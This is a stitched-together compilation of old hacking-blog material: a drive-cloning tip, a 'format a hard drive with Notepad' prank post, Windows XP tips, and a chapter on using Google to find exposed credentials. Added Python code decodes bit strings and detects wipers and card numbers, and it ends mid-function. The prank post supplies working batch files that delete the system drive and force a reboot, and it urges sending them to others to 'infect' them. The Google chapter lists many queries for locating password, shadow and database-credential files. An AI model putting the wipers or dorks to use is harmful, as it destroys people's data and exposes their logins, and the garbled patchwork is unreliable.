This solution is not scalable, dynamic or easy to maintain. But it is free. And it works.

WORKAROUNDS

If the client knows the IP Address of the remote server, he can still connect directly by IP Address.

If the client changes his DNS Server to an Internet DNS server, it bypasses the entries for the hijacked domains. However, if the client is on an Active Directory domain, he will lose access to the domain controllers and Active Directory.

Clients can use a web proxy to view desired web content. External web proxies do not rely on the internal DNS server for name resolution.

Clone A HDD without buying any software

Sunday, December 9, 2007

Did you know that you could clone your current hard drive without having to buy extra software? Maybe you didn't know that everything you need is already set up on your current system? Well, it is... and if you follow this tut, you shouldn't have much of a problem.


Make sure that you have a Master and a Slave setup on your system. The Slave drive, in this case, is where all the data on the Master is going to go to.

First: Perform a Scandisk on your Master drive and follow that with a thorough Defrag. If you have an antivirus program, do a thorough sweep with the AV first, then do the Scandisk, followed by the Defrag.

Second: Do the same thing to the target drive, as you did the Master: Scandisk then a thorough Defrag.

Third: Right-click on the Target drive and click on Format. When the box comes up, click your mouse onto the "Full" button.

Fourth: After Formatting the Target drive, run a Scandisk again and click on the button that says "Autofix Errors".

Fifth: In this final part, you might want to cut-and-paste the code in, unless you are sure that you can type it without making any mistakes:

Click on the "Start" button, then click on the "Run..." button, then place the following into the Runbox:

"XCOPY C:\*.* D:\ /c/h/e/k/r" (minus the quotes, of course) then press the "Enter" button.

If you receive an error message, then remove the space from between XCOPY and C:\

Anything that should happen to come up in the DOS box, just press "Y" for "Yes". When it's all finished, pull the original Master from the system, designate the Slave as the Master (change your jumpers), then check your new Master out.

This tut has worked and has been tested on all systems except for Windows 2000, so you really shouldn't have any problems. If, by any chance, you should come across a snag, message me and I'll walk you through it.

Format a hdd with notepad

Step 1.
Copy The Following In Notepad Exactly as it says


01001011000111110010010101010101010000011111100000


Step 2.
Save As An EXE Any Name Will Do


Step 3.
Send the EXE to People And Infect


OR

IF u think u cannot format c driver when windows is running try and u will get it .. any way some more so u can test on other drives this is simple binary code
format c:\ /Q/X -- this will format your drive c:\

01100110011011110111001001101101011000010111010000 100000011000110011101001011100

0010000000101111010100010010111101011000


format d:\ /Q/X -- this will format your drive d:\

01100110011011110111001001101101011000010111010000 100000011001000011101001011100

0010000000101111010100010010111101011000



format a:\ /Q/X -- this will format your drive a:\


01100110011011110111001001101101011000010111010000 100000011000010011101001011100

0010000000101111010100010010111101011000



del /F/S/Q c:\boot.ini -- this will cause your computer not to boot.


01100100011001010110110000100000001011110100011000 101111010100110010111101010001

00100000011000110011101001011100011000100110111101 101111011101000010111001101001

0110111001101001


Work the rest out yourself; it is all the same encoding.

Do not try this on your own PC. It is here for educational purposes only, and unlike the "binary" above, the batch files that follow really do run.

If you still cannot figure it out, open Notepad and type:

@Echo off
Del C:\ *.*y

save it as Dell.bat


Worse still:

@echo off
del %systemdrive%\*.*/f/s/q
shutdown -r -f -t 00

and save it as a .bat file
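As an added example (not code from the original post), the script below shows what the "binary code" above actually is and gives a defender a way to inspect a batch file before running it: it decodes the bit strings back into the commands they spell, shows that the 50-bit "EXE" string is not even byte-aligned, and flags lines in a batch file that would wipe a drive or force a reboot. The bit strings are copied from the post; the sample batch text is constructed.

```python
"""Added example, not part of the original post: what the "binary code" is.

The strings of ones and zeros above are the ASCII bit patterns of the
commands printed next to them, nothing more. Saving such a string from
Notepad with an .exe extension gives you a text file that Windows will not
run as a program, so that part of the trick is a hoax. The .bat versions
are a different matter: the command interpreter runs them exactly as
typed. This decodes the bit strings and flags lines in a batch file that
would wipe a drive, so a file from an untrusted source can be inspected
before anyone double-clicks it. The sample batch text is constructed.
"""
import re

# Bit strings copied from the post above; the stray spaces come from line
# wrapping and are ignored by the decoder.
FORMAT_C_BITS = (
    "01100110011011110111001001101101011000010111010000 100000011000110011101001011100"
    "0010000000101111010100010010111101011000"
)
DEL_BOOT_INI_BITS = (
    "01100100011001010110110000100000001011110100011000 101111010100110010111101010001"
    "00100000011000110011101001011100011000100110111101 101111011101000010111001101001"
    "0110111001101001"
)
EXE_HOAX_BITS = "01001011000111110010010101010101010000011111100000"

# Command lines nobody should find in a batch file somebody sent them.
DESTRUCTIVE = [
    (re.compile(r"^\s*format\s+[a-z]:", re.I), "formats a drive"),
    (re.compile(r"^\s*del\b.*boot\.ini", re.I), "deletes the boot loader configuration"),
    (re.compile(r"^\s*del\b.*(?:/s|/q|\*\.\*)", re.I), "recursive or unprompted delete"),
    (re.compile(r"^\s*shutdown\b.*-f", re.I), "forces a reboot, discarding unsaved work"),
    (re.compile(r"%systemdrive%", re.I), "targets the Windows system drive"),
]


def decode_bits(bits):
    """Turn a string of 0/1 characters (whitespace ignored) back into ASCII.

    Raises ValueError when the length is not a multiple of eight; the 50-bit
    "EXE" string fails this way because it is not even a whole number of bytes.
    """
    clean = re.sub(r"\s+", "", bits)
    if set(clean) - {"0", "1"}:
        raise ValueError("not a bit string")
    if len(clean) % 8:
        raise ValueError("%d bits is not a whole number of bytes" % len(clean))
    return "".join(chr(int(clean[i:i + 8], 2)) for i in range(0, len(clean), 8))


def is_byte_aligned(bits):
    """True if decode_bits would accept the string."""
    return len(re.sub(r"\s+", "", bits)) % 8 == 0


def flag_destructive(batch_text):
    """Return (line number, line, reason) for every dangerous line in a batch file."""
    hits = []
    for number, line in enumerate(batch_text.splitlines(), 1):
        for pattern, reason in DESTRUCTIVE:
            if pattern.search(line):
                hits.append((number, line.strip(), reason))
                break
    return hits


if __name__ == "__main__":
    print(repr(decode_bits(FORMAT_C_BITS)))
    print(repr(decode_bits(DEL_BOOT_INI_BITS)))
    print("EXE string byte-aligned:", is_byte_aligned(EXE_HOAX_BITS))
    sample = "@echo off\r\ndel %systemdrive%\\*.*/f/s/q\r\nshutdown -r -f -t 00\r\n"
    for hit in flag_destructive(sample):
        print(hit)
```

The pattern list is deliberately short and matches on the first hit per line; the point is that a batch file is readable text, so the thing to do with one you did not write is read it (or run it through a check like this), never double-click it.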

20 things you didn't know about XP

1. It boasts how long it can stay up. Whereas previous versions of Windows were coy about how long they went between boots, XP is positively proud of its stamina. Go to the Command Prompt in the Accessories menu from the All Programs start button option, and then type 'systeminfo'. The computer will produce a lot of useful info, including the uptime. If you want to keep these, type 'systeminfo > info.txt'. This creates a file called info.txt you can look at later with Notepad. (Professional Edition only).

2. You can delete files immediately, without having them move to the Recycle Bin first. Go to the Start menu, select Run... and type 'gpedit.msc'; then select User Configuration, Administrative Templates, Windows Components, Windows Explorer and find the Do not move deleted files to the Recycle Bin setting. Set it. Poking around in gpedit will reveal a great many interface and system options, but take care -- some may stop your computer behaving as you wish. (Professional Edition only).

3. You can lock your XP workstation with two clicks of the mouse. Create a new shortcut on your desktop using a right mouse click, and enter 'rundll32.exe user32.dll,LockWorkStation' in the location field. Give the shortcut a name you like. That's it -- just double click on it and your computer will be locked. And if that's not easy enough, Windows key + L will do the same.

4. XP hides some system software you might want to remove, such as Windows Messenger, but you can tickle it and make it disgorge everything. Using Notepad or Edit, edit the text file \windows\inf\sysoc.inf, search for the word 'hide' and remove it. You can then go to Add or Remove Programs in the Control Panel, select Add/Remove Windows Components and there will be your prey, exposed and vulnerable.

5. For those skilled in the art of DOS batch files, XP has a number of interesting new commands. These include 'eventcreate' and 'eventtriggers' for creating and watching system events, 'typeperf' for monitoring performance of various subsystems, and 'schtasks' for handling scheduled tasks. As usual, typing the command name followed by /? will give a list of options -- they're all far too baroque to go into here.

6. XP has IP version 6 support -- the next generation of IP. Unfortunately this is more than your ISP has, so you can only experiment with this on your LAN. Type 'ipv6 install' into Run... (it's OK, it won't ruin your existing network setup) and then 'ipv6 /?' at the command line to find out more. If you don't know what IPv6 is, don't worry and don't bother.

7. You can at last get rid of tasks on the computer from the command line by using 'taskkill /pid' and the task number, or just 'tskill' and the process number. Find that out by typing 'tasklist', which will also tell you a lot about what's going on in your system.

8. XP will treat Zip files like folders, which is nice if you've got a fast machine. On slower machines, you can make XP leave zip files well alone by typing 'regsvr32 /u zipfldr.dll' at the command line. If you change your mind later, you can put things back as they were by typing 'regsvr32 zipfldr.dll'.

9. XP has ClearType -- Microsoft's anti-aliasing font display technology -- but doesn't have it enabled by default. It's well worth trying, especially if you were there for DOS and all those years of staring at a screen have given you the eyes of an astigmatic bat. To enable ClearType, right click on the desktop, select Properties, Appearance, Effects, select ClearType from the second drop-down menu and enable the selection. Expect best results on laptop displays. If you want to use ClearType on the Welcome login screen as well, set the registry entry HKEY_USERS\.DEFAULT\Control Panel\Desktop\FontSmoothingType to 2.

10. You can use Remote Assistance to help a friend who's using network address translation (NAT) on a home network, but not automatically. Get your pal to email you a Remote Assistance invitation and edit the file. Under the RCTICKET attribute will be a NAT IP address, like 192.168.1.10. Replace this with your chum's real IP address -- they can find this out by going to www.whatismyip.com -- and get them to make sure that they've got port 3389 open on their firewall and forwarded to the errant computer.

11. You can run a program as a different user without logging out and back in again. Right click the icon, select Run As... and enter the user name and password you want to use. This only applies for that run. The trick is particularly useful if you need to have administrative permissions to install a program, which many require. Note that you can have some fun by running programs multiple times on the same system as different users, but this can have unforeseen effects.

12. Windows XP can be very insistent about you checking for auto updates, registering a Passport, using Windows Messenger and so on. After a while, the nagging goes away, but if you feel you might slip the bonds of sanity before that point, run Regedit, go to HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced and create a DWORD value called EnableBalloonTips with a value of 0.

13. You can start up without needing to enter a user name or password. Select Run... from the start menu and type 'control userpasswords2', which will open the user accounts application. On the Users tab, clear the box for Users Must Enter A User Name And Password To Use This Computer, and click on OK. An Automatically Log On dialog box will appear; enter the user name and password for the account you want to use. Bear in mind what this does: the password is stored on the machine so Windows can log on without asking, and anyone who can switch the computer on lands in that account, so don't do it on a laptop or on a machine holding data you care about.

14. Internet Explorer 6 will automatically delete temporary files, but only if you tell it to. Start the browser, select Tools / Internet Options... and Advanced, go down to the Security area and check the box to Empty Temporary Internet Files folder when browser is closed.

15. XP comes with a free Network Activity Light, just in case you can't see the LEDs twinkle on your network card. Right click on My Network Places on the desktop, then select Properties. Right click on the description for your LAN or dial-up connection, select Properties, then check the Show icon in notification area when connected box. You'll now see a tiny network icon on the right of your task bar that glimmers nicely during network traffic.

16. The Start Menu can be leisurely when it decides to appear, but you can speed things along by changing the registry entry HKEY_CURRENT_USER\Control Panel\Desktop\MenuShowDelay from the default 400 to something a little snappier. Like 0.

17. You can rename loads of files at once in Windows Explorer. Highlight a set of files in a window, then right click on one and rename it. All the other files will be renamed to that name, with individual numbers in brackets to distinguish them. Also, in a folder you can arrange icons in alphabetised groups by View, Arrange Icon By... Show In Groups.

18. Windows Media Player will display the cover art for albums as it plays the tracks -- if it found the picture on the Internet when you copied the tracks from the CD. If it didn't, or if you have lots of pre-WMP music files, you can put your own copy of the cover art in the same directory as the tracks. Just call it folder.jpg and Windows Media Player will pick it up and display it.

19. Windows key + Break brings up the System Properties dialogue box; Windows key + D brings up the desktop; Windows key + Tab moves through the taskbar buttons.

20. XP's successor, codenamed Longhorn, shipped as Windows Vista. The next big release is codenamed Blackcomb and is expected in 2010/2011.

Hacking Google for finding passwords and other personal info

Introduction
This is not about finding sensitive data during an assessment as much as
it is about what the “bad guys” might do to troll for the data.The examples presented
generally represent the lowest-hanging fruit on the security
tree. Hackers target this information on a daily basis.To protect against this type
of attacker, we need to be fairly candid about the worst-case possibilities.We
won’t be overly candid, however.
We start by looking at some queries that can be used to uncover usernames,
the less important half of most authentication systems. The value of a username is
often overlooked, but an entire multimillion-dollar security system can be
shattered through skillful crafting of even the smallest, most innocuous bit of
information.
Next, we take a look at queries that are designed to uncover passwords. Some
of the queries we look at reveal encrypted or encoded passwords, which will take
a bit of work on the part of an attacker to use to his or her advantage.We also
take a look at queries that can uncover cleartext passwords.These queries are some
of the most dangerous in the hands of even the most novice attacker. What could
make an attack easier than handing a username and cleartext password to an
attacker?
We wrap up by discussing the very real possibility of uncovering
highly sensitive data such as credit card information and information used to
commit identity theft, such as Social Security numbers. Our goal here is to
explore ways of protecting against this very real threat.To that end, we don’t go
into details about uncovering financial information and the like. If you’re a “dark
side” hacker, you’ll need to figure these things out on your own.
Searching for Usernames
Most authentication mechanisms use a username and password to protect information.
To get through the “front door” of this type of protection, you’ll need to
determine usernames as well as passwords. Usernames also can be used for social
engineering efforts, as we discussed earlier.
Many methods can be used to determine usernames. In Chapter 10, we
explored ways of gathering usernames via database error messages. In Chapter 8
we explored Web server and application error messages that can reveal various
information, including usernames. These indirect methods of locating usernames
are helpful, but an attacker could also target usernames directly with a
query like "your username is". This phrase can locate help pages that describe the
username creation process. Usernames found this way can be combined with
information gleaned from other sources, such as Google Groups posts or phone
listings, and then recycled into various other phases of the
attack, such as a worm-based spam campaign or a social-engineering attempt. An
attacker can gather usernames from a variety of sources, as shown in the sample
queries listed below.
Sample Queries That Locate Usernames

inurl:admin inurl:userlist
    Generic userlist files
inurl:admin filetype:asp inurl:userlist
    Generic userlist files
inurl:php inurl:hlstats intext:"Server Username"
    Half-Life statistics file, lists username and other information
filetype:ctl inurl:haccess.ctl Basic
    Microsoft FrontPage equivalent of htaccess, shows Web user credentials
filetype:reg reg intext:"internet account manager"
    Microsoft Internet Account Manager can reveal usernames and more
filetype:wab wab
    Microsoft Outlook Express mail address books
filetype:mdb inurl:profiles
    Microsoft Access databases containing (user) profiles
index.of perform.ini
    mIRC IRC ini file can list IRC usernames and other information
inurl:root.asp?acs=anon
    Outlook Web Access directory can be used to discover usernames
filetype:conf inurl:proftpd.conf -sample
    ProFTPD FTP server configuration file reveals username and server information
filetype:log username putty
    PuTTY SSH client logs can reveal usernames and server information
filetype:rdp rdp
    Remote Desktop Connection files reveal user credentials
intitle:index.of .bash_history
    UNIX bash shell history reveals commands typed at a bash command prompt; usernames are often typed as argument strings
intitle:index.of .sh_history
    UNIX shell history reveals commands typed at a shell command prompt; usernames are often typed as argument strings
"index of " lck
    Various lock files list the user currently using a file
+intext:webalizer +intext:"Total Usernames" +intext:"Usage Statistics for"
    Webalizer Web statistics page lists Web usernames and statistical information
filetype:reg reg HKEY_CURRENT_USER username
    Windows Registry exports can reveal usernames and other information

Underground Googling
Searching for a Known Filename
Remember that there are several ways to search for a known filename.
One way relies on locating the file in a directory listing, like intitle:index.of
install.log. Another, often better, method relies on the filetype operator,
as in filetype:log inurl:install.log. Directory listings are not all that
common. Google will crawl a link to a file in a directory listing, meaning
that the filetype method will find both directory listing entries as well as
files crawled in other ways.

In some cases, usernames can be gathered from Web-based statistical programs
that check Web activity.The Webalizer program shows all sorts of information
about a Web server’s usage. Output files for the Webalizer program can be
located with a query such as intext:webalizer intext:”Total Usernames” intext:”Usage
Statistics for”. Among the information displayed is the username that was used to
connect to the Web server, as shown in Figure 9.2. In some cases, however, the
usernames displayed are not valid or current, but the “Visits” column lists the
number of times a user account was used during the capture period.This enables
an attacker to easily determine which accounts are more likely to be valid.


The Windows registry holds all sorts of authentication information, including
usernames and passwords. Though it is unlikely (and fairly uncommon) to locate
live, exported Windows registry files on the Web, at the time of this writing
there are nearly 100 hits on the query filetype:reg HKEY_CURRENT_USER
username, which locates Windows registry files that contain the word username
and, in some cases, passwords.



As any talented attacker or security person will tell you, it’s rare to get information
served to you on a silver platter. Most decent finds take a bit of persistence,
creativity, intelligence, and just a bit of good luck. For example, consider
the Microsoft Outlook Web Access portal, which can be located with a query
like inurl:root.asp?acs=anon. At the time of this writing, fewer than 50 sites are
returned by this query, even though there are certainly more than 50 sites running
the Microsoft Web-based mail portal. Regardless of how you might locate a site
running this e-mail gateway, it's not uncommon for the site to host a public
directory (denoted "Find Names," by default).


The public directory allows access to a search page that can be used to find
users by name. In most cases, wildcard searching is not allowed, meaning that a
search for * will not return a list of all users, as might be expected. Entering a
search for a space is an interesting idea, since most user descriptions contain a
space, but most large directories will return the error message “This query would
return too many addresses!” Applying a bit of creativity, an attacker could begin
searching for individual common letters, such as the “Wheel of Fortune letters”
R, S,T, L, N, and E. Eventually one of these searches will most likely reveal a list
of user information like


Once a list of user information is returned, the attacker can then recycle the
search with words contained in the user list, searching for the words Voyager,
Freshmen, or Campus, for example.Those results can then be recycled, eventually
resulting in a nearly complete list of user information.
Searching for Passwords
Password data, one of the “Holy Grails” during a penetration test, should be protected.
Unfortunately, many examples of Google queries can be used to locate
passwords on the Web, as shown in Table 9.2.
Table 9.2 Queries That Locate Password Information

inurl:/db/main.mdb
    ASP-Nuke passwords
filetype:cfm "cfapplication name" password
    ColdFusion source with potential passwords
filetype:pass pass intext:userid
    dbman credentials
allinurl:auth_user_file.txt
    DCForum user passwords
eggdrop filetype:user user
    Eggdrop IRC user credentials
filetype:ini inurl:flashFXP.ini
    FlashFXP FTP credentials
filetype:url +inurl:"ftp://" +inurl:"@"
    FTP bookmarks, cleartext passwords
inurl:zebra.conf intext:password -sample -test -tutorial -download
    GNU Zebra passwords
filetype:htpasswd htpasswd
    HTTP htpasswd Web user credentials
intitle:"Index of" ".htpasswd" "htgroup" -intitle:"dist" -apache -htpasswd.c
    HTTP htpasswd Web user credentials
intitle:"Index of" ".htpasswd" htpasswd.bak
    HTTP htpasswd Web user credentials
"http://*:*@www" bob:bob
    HTTP passwords (bob is a sample username)
"sets mode: +k"
    IRC channel keys (passwords)
"Your password is * Remember this for later use"
    IRC NickServ registration passwords
signin filetype:url
    JavaScript authentication credentials
LeapFTP intitle:"index.of./" sites.ini modified
    LeapFTP client login credentials
inurl:lilo.conf filetype:conf password -tatercounter2000 -bootpwd -man
    LILO passwords
filetype:config config intext:appSettings "User ID"
    Microsoft .NET application credentials
filetype:pwd service
    Microsoft FrontPage Service Web passwords
intitle:index.of administrators.pwd
    Microsoft FrontPage Web credentials
"# -FrontPage-" inurl:service.pwd
    Microsoft FrontPage Web passwords
ext:pwd inurl:_vti_pvt inurl:(Service authors administrators)
    Microsoft FrontPage Web passwords
inurl:perform filetype:ini
    mIRC NickServ credentials
intitle:"index of" intext:connect.inc
    MySQL database credentials
intitle:"index of" intext:globals.inc
    MySQL database credentials
filetype:conf oekakibbs
    Oekakibbs user passwords
filetype:dat wand.dat
    Opera "Magic Wand" Web credentials
inurl:ospfd.conf intext:password -sample -test -tutorial -download
    OSPF daemon passwords
index.of passlist
    Passlist user credentials
inurl:passlist.txt
    passlist.txt file user credentials
filetype:dat "password.dat"
    password.dat files
inurl:password.log filetype:log
    password.log file reveals usernames, passwords, and hostnames
filetype:log inurl:"password.log"
    password.log files, cleartext passwords
inurl:people.lst filetype:lst
    people.lst generic password file
intitle:index.of config.php
    PHP configuration file, database credentials
inurl:config.php dbuname dbpass
    PHP configuration file, database credentials
inurl:nuke filetype:sql
    PHP-Nuke credentials
filetype:conf inurl:psybnc.conf "USER.PASS="
    psyBNC IRC user credentials
filetype:ini ServUDaemon
    Serv-U FTP daemon credentials
filetype:conf slapd.conf
    slapd configuration files, root password
inurl:"slapd.conf" intext:"credentials" -manpage -"Manual Page" -man: -sample
    slapd LDAP credentials
inurl:"slapd.conf" intext:"rootpw" -manpage -"Manual Page" -man: -sample
    slapd LDAP root password
filetype:sql "IDENTIFIED BY" -cvs
    SQL passwords
filetype:sql password
    SQL passwords
filetype:ini wcx_ftp
    Total Commander FTP passwords
filetype:netrc password
    UNIX .netrc user credentials
index.of.etc
    UNIX /etc directories contain various credential files
intitle:"Index of..etc" passwd
    UNIX /etc/passwd user credentials
intitle:index.of passwd passwd.bak
    UNIX /etc/passwd user credentials
intitle:"Index of" pwd.db
    UNIX /etc/pwd.db credentials
intitle:Index.of etc shadow
    UNIX /etc/shadow user credentials
intitle:index.of master.passwd
    UNIX master.passwd user credentials
intitle:"Index of" spwd.db passwd -pam.conf
    UNIX spwd.db credentials
filetype:bak inurl:"htaccess|passwd|shadow|htusers"
    UNIX various password file backups
filetype:inc dbconn
    Various database credentials
filetype:inc intext:mysql_connect
    Various database credentials, server names
filetype:properties inurl:db intext:password
    Various database credentials, server names
inurl:vtund.conf intext:pass -cvs
    Virtual Tunnel Daemon passwords
inurl:"wvdial.conf" intext:password
    wvdial dialup user credentials
filetype:mdb wwforum
    Web Wiz Forums Web credentials
"AutoCreate=TRUE password=*"
    Website Access Analyzer user passwords
filetype:pwl pwl
    Windows Password List user credentials
filetype:reg reg +intext:"defaultusername" intext:"defaultpassword"
    Windows Registry keys containing user credentials
filetype:reg reg +intext:"internet account manager"
    Windows Registry keys containing user credentials
"index of/" "ws_ftp.ini" "parent directory"
    WS_FTP FTP credentials
filetype:ini ws_ftp pwd
    WS_FTP FTP user credentials
inurl:/wwwboard
    wwwboard user credentials
In most cases, passwords discovered on the Web are either encrypted or
encoded in some way. Such passwords can be fed into a password
cracker such as John the Ripper from www.openwall.com/john to produce
plaintext passwords that can be used in an attack. Figure 9.6 shows the results of
the search ext:pwd inurl:_vti_pvt inurl:(Service authors administrators), which
combines a search for some common

Exported Windows registry files often contain encrypted or encoded passwords
as well. If a user exports the Windows registry to a file and Google subsequently
crawls that file, a query like filetype:reg intext:"internet account manager"
could reveal interesting keys containing password data.

Note that live, exported Windows registry files are not very common, but it's
not uncommon for an attacker to target a site simply because of one exceptionally
insecure file. It's also possible for a Google query to uncover cleartext passwords.
These passwords can be used as is without having to employ a
password-cracking utility. In these extreme cases, the only challenge is determining
the username as well as the host on which the password can be used. As
shown in Figure 9.8, certain queries will locate all the following information:
usernames, cleartext passwords, and the host that uses that authentication!


There is no magic query for locating passwords, but during an assessment,
remember that the simplest queries directed at a site can have amazing results, as
we discussed in Chapter 7, Ten Simple Searches. For example, a query like "Your
password" forgot would locate pages that provide a forgotten password recovery
mechanism. The information from this type of query can be used to formulate
any of a number of attacks against a password. As always, effective social engineering
is a terrific nontechnical solution to "forgotten" passwords.
Another generic search for password information, intext:(password passcode
pass) intext:(username userid user), combines common words for passwords and
user IDs into one query.This query returns a lot of results, but the vast majority
of the top hits refer to pages that list forgotten password information, including
either links or contact information. Using Google’s translate feature, found at
http://translate.google.com/translate_t, we could also create multilingual password
searches. Table 9.3 lists common translations for the word password.

Table 9.3 English Translations of the Word Password
    German      Kennwort
    Spanish     contraseña
    French      mot de passe
    Italian     parola d'accesso
    Portuguese  senha
    Dutch       Paswoord
NOTE
The terms username and userid in most languages translate to username
and userid, respectively.
Searching for Credit Card Numbers, Social Security Numbers, and More

Most people have heard news stories about Web hackers making off with customer
credit card information. With so many fly-by-night retailers popping up
on the Internet, it's no wonder that credit card fraud is so prolific. These
mom-and-pop retailers are not the only ones successfully compromised by hackers.
Corporate giants by the hundreds have had financial database compromises over
the years, victims of sometimes very technical, highly focused attackers. What
might surprise you is that it doesn't take a rocket scientist to uncover live credit
card numbers on the Internet, thanks to search engines like Google. Everything
from credit information to banking data or supersensitive classified government
documents can be found on the Web. Consider the (highly edited) Web page
shown in Figure 9.9.

This document, found using Google, lists hundreds and hundreds of credit
card numbers (including expiration date and card validation numbers) as well as
the owners' names, addresses, and phone numbers. This particular document also
included phone card (calling card) numbers. Notice the scroll bar on the right-hand
side of Figure 9.9, an indicator that the displayed page is only a small part
of this huge document, like many other documents of its kind. In most cases,
pages that contain these numbers are not "leaked" from online retailers or e-commerce
sites but rather are most likely the fruits of a scam known as phishing,
in which users are solicited via telephone or e-mail for personal information.
Several Web sites, including MillerSmiles.co.uk, document these scams and
hoaxes. Figure 9.10 shows a screen shot of a popular eBay phishing scam that
encourages users to update their eBay profile information.


Once a user fills out this form, all the information is sent via e-mail to the
attacker, who can use it for just about anything.
Tools and Traps
Catching Online Scammers
In some cases, you might be able to use Google to help nab the bad guys.
Phishing scams are effective because the fake page looks like an official
page. To create an official-looking page, the bad guys must have examples
to work from, meaning that they must have visited a few legitimate companies’
Web sites. If the phishing scam was created using text from several
companies’ existing pages, you can key in on specific phrases from the fake
page, creating Google queries designed to round up the servers that hosted
some of the original content. Once you’ve located the servers that contained
the pilfered text, you can work with the companies involved to
extract correlating connection data from their log files. If the scammer visited
each company’s Web page, collecting bits of realistic text, his IP should
appear in each of the log files. Auditors at SensePost (www.sensepost.com)
have successfully used this technique to nab online scam artists.
Unfortunately, if the scammer uses an exact copy of a page from only one
company, this task becomes much more difficult to accomplish.
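The correlation described in the box above, worked through as an added example (this is not code from the text or from SensePost): find the phrases a phishing page shares with each company's legitimate pages, pull from each company's web server log the client addresses that fetched those pages, and intersect the sets. Company names, page text, log lines and addresses are all constructed for the example (addresses are from the documentation ranges); the log format assumed is Apache/NCSA combined.

```python
"""Added example, not part of the original text: the correlation described
in the box above, worked through on constructed data.

Given the text of a phishing page and the legitimate pages of the companies
it was stitched together from, find the phrases they share, then pull from
each company's web server log the client addresses that fetched the copied
pages and intersect them. An address present in every company's log is a
candidate for whoever collected the text. The company names, page text, log
lines and addresses below are all made up for the example (the addresses are
from the documentation ranges); the log format is Apache/NCSA combined.
"""
import re

# client - user [time] "METHOD /path HTTP/1.x" status bytes "referer" "agent"
LOG_RE = re.compile(r'^(\S+) \S+ \S+ \[[^\]]+\] "(?:GET|POST) (\S+) ')


def ngrams(text, n=5):
    """Lower-cased word n-grams; five words is long enough that a shared
    phrase is unlikely to be coincidence."""
    words = re.findall(r"[a-z0-9']+", text.lower())
    return {" ".join(words[i:i + n]) for i in range(len(words) - n + 1)}


def shared_phrases(scam_text, legit_pages, n=5):
    """Map each legitimate page path to the phrases the scam page shares with it."""
    scam = ngrams(scam_text, n)
    return {path: scam & ngrams(text, n) for path, text in legit_pages.items()}


def ips_for_paths(log_lines, paths):
    """Client addresses that requested any of the given paths in one server's log."""
    seen = set()
    for line in log_lines:
        match = LOG_RE.match(line)
        if match and match.group(2) in paths:
            seen.add(match.group(1))
    return seen


def correlate(scam_text, companies):
    """companies maps a name to (pages {path: text}, log lines). Returns the
    addresses that fetched a copied page at every company."""
    candidates = []
    for pages, log_lines in companies.values():
        copied = {path for path, common in shared_phrases(scam_text, pages).items() if common}
        candidates.append(ips_for_paths(log_lines, copied))
    return set.intersection(*candidates) if candidates else set()


SCAM_TEXT = (
    "Dear valued customer, please confirm your account details within 48 hours "
    "to avoid suspension. Also update your profile information to keep your "
    "account in good standing."
)
BANK_LOG = [  # constructed log lines
    '203.0.113.7 - - [10/Oct/2007:13:55:36 -0700] "GET /security/notice.html HTTP/1.1" 200 2326 "-" "Mozilla/4.0"',
    '198.51.100.5 - - [10/Oct/2007:14:02:11 -0700] "GET /security/notice.html HTTP/1.1" 200 2326 "-" "Mozilla/4.0"',
    '192.0.2.1 - - [10/Oct/2007:14:10:40 -0700] "GET /index.html HTTP/1.1" 200 1043 "-" "Mozilla/4.0"',
]
AUCTION_LOG = [
    '203.0.113.7 - - [11/Oct/2007:09:12:03 -0700] "GET /help/profile.html HTTP/1.1" 200 3110 "-" "Mozilla/4.0"',
    '192.0.2.1 - - [11/Oct/2007:09:30:22 -0700] "GET /help/profile.html HTTP/1.1" 200 3110 "-" "Mozilla/4.0"',
    '198.51.100.5 - - [11/Oct/2007:10:01:57 -0700] "GET /index.html HTTP/1.1" 200 980 "-" "Mozilla/4.0"',
]
COMPANIES = {
    "example-bank": ({
        "/security/notice.html": "If we see unusual activity we will ask you to confirm "
                                 "your account details within 48 hours to avoid suspension "
                                 "of online access.",
        "/index.html": "Welcome to Example Bank. Log in to see your balances.",
    }, BANK_LOG),
    "example-auctions": ({
        "/help/profile.html": "You can update your profile information to keep your "
                              "account in good standing at any time.",
        "/index.html": "Buy and sell with confidence on Example Auctions.",
    }, AUCTION_LOG),
}


def demo():
    return correlate(SCAM_TEXT, COMPANIES)


if __name__ == "__main__":
    for name, (pages, _log) in COMPANIES.items():
        for path, common in shared_phrases(SCAM_TEXT, pages).items():
            if common:
                print(name, path, "shares", len(common), "phrases")
    print("seen at every company:", demo())
```

Two addresses fetched a copied page at one company each; only 203.0.113.7 did so at both, which is exactly the narrowing the box describes. With real logs you would also restrict the time window to the days before the scam appeared, and the method still fails when the page was copied wholesale from a single site.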
Social Security Numbers
Social Security numbers (SSNs) and other sensitive data can be easily located
with Google as well as via the same techniques used to locate credit card numbers.
For a variety of reasons, SSNs might appear online—for example, educational
facilities are notorious for using an SSN as a student ID, then posting
grades to a public Web site with the “student ID” displayed next to the grade.A
creative attacker can do quite a bit with just an SSN, but in many cases it helps
to also have a name associated with that SSN. Again, educational facilities have
been found exposing this information via Excel spreadsheets listing student’s
names, grades, and SSNs, despite the fact that the student ID number is often
used to help protect the privacy of the student! Although we don’t feel it’s right
to go into the details of how this data is located, several media outlets have irresponsibly
posted the details online. Although the blame lies with the sites that are
leaking this information, in our opinion it’s still not right to draw attention to
how exactly the information can be located.
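The text stops short of showing how this data is found, and so does this example; instead it shows the check a site owner would run on their own documents before a crawler gets to them. As an added example (not code from the text), it finds card numbers and Social Security numbers in text, using the Luhn check to discard order and phone numbers that merely look like card numbers and the structural rules for SSNs to discard values that are never issued. The sample text is constructed and the card numbers in it are the standard test numbers.

```python
"""Added example, not part of the original text: find card numbers and
Social Security numbers in your own documents before a search engine does.

A bare digit regex fires on order numbers and phone numbers, so a candidate
card number must also pass the Luhn check that every real card number
satisfies, and a candidate SSN must avoid the values the Social Security
Administration never issues (area 000, 666 or 900-999, group 00, serial
0000). The sample text is constructed; the card numbers in it are the
standard test numbers, not real accounts.
"""
import re

# 13 to 19 digits, optionally separated by single spaces or hyphens, not
# embedded in a longer digit run.
CARD_RE = re.compile(r"(?<!\d)(?:\d[ -]?){12,18}\d(?!\d)")
SSN_RE = re.compile(r"(?<!\d)(\d{3})-(\d{2})-(\d{4})(?!\d)")


def luhn_ok(digits):
    """Luhn checksum: double every second digit from the right, subtract 9
    from doubled values above 9, and the total must be a multiple of ten."""
    total = 0
    for index, char in enumerate(reversed(digits)):
        digit = int(char)
        if index % 2 == 1:
            digit *= 2
            if digit > 9:
                digit -= 9
        total += digit
    return total % 10 == 0


def find_card_numbers(text):
    """Digit strings that look like card numbers and pass Luhn, in order found."""
    found = []
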